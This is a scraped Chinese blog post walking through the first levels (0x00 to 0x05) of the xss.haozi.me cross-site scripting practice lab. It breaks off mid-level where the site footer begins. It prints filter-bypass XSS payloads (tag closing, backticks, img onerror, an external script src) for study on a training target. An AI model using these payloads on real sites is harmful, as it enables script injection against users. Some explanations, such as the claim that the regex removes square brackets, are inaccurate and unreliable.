- 1Nginx应用(搭建网站、设置权限、用户认证)_nginx 权限验证
- 2gitee配置ssh公钥免密登录_gitee ssh
- 3服务器部署测试环境回顾与改进建议
- 4如何在服务器上安装宝塔面板
- 5应用程序无法正常启动0xc000007b请点击确定关闭应用程序_0xc000007b应用程序无法正常启动
- 6c# --WPF学习之路(一)_c# wpf
- 7能ping通,但打不开网页解决方案_能ping通打不开网页
- 8Linux(ubuntu)下编程方面-杂项_libgtkglext1
- 9配置服务器通过公司代理地址连接公网YUM源_如何使用代理服务器访问公网yum源
- 10/lib64/libc.so.6: version `GLIBC_2.7' not found 解决方案
xss靶场、xss.haozi.me靶场详细通关教程
赞
踩
前言
该靶场来自xss经典靶场,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。
预备知识
HTML编码
HTML编码网站:
img的可拓展
img标签的可扩展
各种payload形式
各种payload:
0x00
第一关简单使用payload**<script>alert(1)</script>**即可弹出。
0x01
使用payload**</textarea><script>alert(1)</script><textarea>**即可绕过。
源代码使用了<textarea> </textarea>来输出,我们使用闭合标签来闭合它俩,即可成功执行。
源代码加上我们的paylaod即为
<textarea></textarea><script>alert(1)</script><textarea></textarea>
- 1
0x02
这里使用了<input>标签,思路是通过闭合payload。
asdf'">'<script>alert(1)</script>
- 1
加上闭合payload后,总代码为
function render (input) {
return '<input type="name" value="'asdf'">'<script>alert(1)</script>'">'
}
- 1
- 2
- 3
0x03(使用了正则过滤圆括号)
这里服务器用了一些正则过滤
function render (input) {
const stripBracketsRe = /[()]/g
input = input.replace(stripBracketsRe, '')
return input
}
- 1
- 2
- 3
- 4
- 5
这段函数的作用是从输入的字符串中移除所有括号(包括圆括号和方括号)。具体来说,它会执行以下操作:
定义一个正则表达式 stripBracketsRe,用于匹配字符串中的所有圆括号和方括号。
调用 replace() 方法将输入字符串中匹配到的所有括号用空字符串替换掉,得到一个不包含任何括号的新字符串。
返回新字符串。
需要注意的是,该函数仅仅只是移除括号,并不会对字符串做其他处理,例如去除空格、转换大小写等等。
这里可以采用反引号来绕过
<script>alert`1`</script>
- 1
其它解法
虽然过滤了圆括号,我们只需要使用不带圆括号的payload即可。
第一种
其中onerror编码了alert(1)
<img src="1" onerror="alert(1)">
- 1
第二种
使用了script中的src来导入js
<script src="https://xss.haozi.me/j.js"></script>
- 1
0x04(使用正则过滤圆括号和反引号)
源代码是这样的,它过滤了圆括号和反引号。
所以只能使用HTML实体编码来绕过。
function render (input) {
const stripBracketsRe = /[()`]/g
input = input.replace(stripBracketsRe, '')
return input
}
- 1
- 2
- 3
- 4
- 5
直接将括号转成html实体编码将没有用
比如这段代码
**<script>alert (1)</script>**如果直接输上去肯定不行,因为
HTML实体编码是为了在HTML文本中使用特殊字符而设计的一种编码方式,比如“<”、“>”、“&”等字符。这些字符在HTML中具有特殊含义,如果直接在HTML文本中使用它们,会导致浏览器将其解释为HTML标签或其他特殊字符,从而破坏文档结构。
因此,在HTML中使用这些字符时,需要将其替换为对应的实体编码形式,例如“<”用“<”代替,“>”用“>”代替,“&”用“&”代替。这样,浏览器就能正确地解析这些字符而不会破坏文档结构。
在这个例子中,代码<script>alert(1)</script>中的括号“(`)”被替换为了实体编码“(”和“)”,这是为了避免浏览器将其解释为JavaScript语句的一部分。当浏览器遇到这段代码时,它会将其解析为一个普通的文本字符串而不会执行其中的JavaScript语句。
- 1
- 2
- 3
- 4
- 5
所以只能使用一个标签**<img src=1 οnerrοr="alert(1)“**就可以
0x05(绕过html注释符)
服务器源代码是这样的
function render (input) {
input = input.replace(/-->/g, '声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/184643Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。
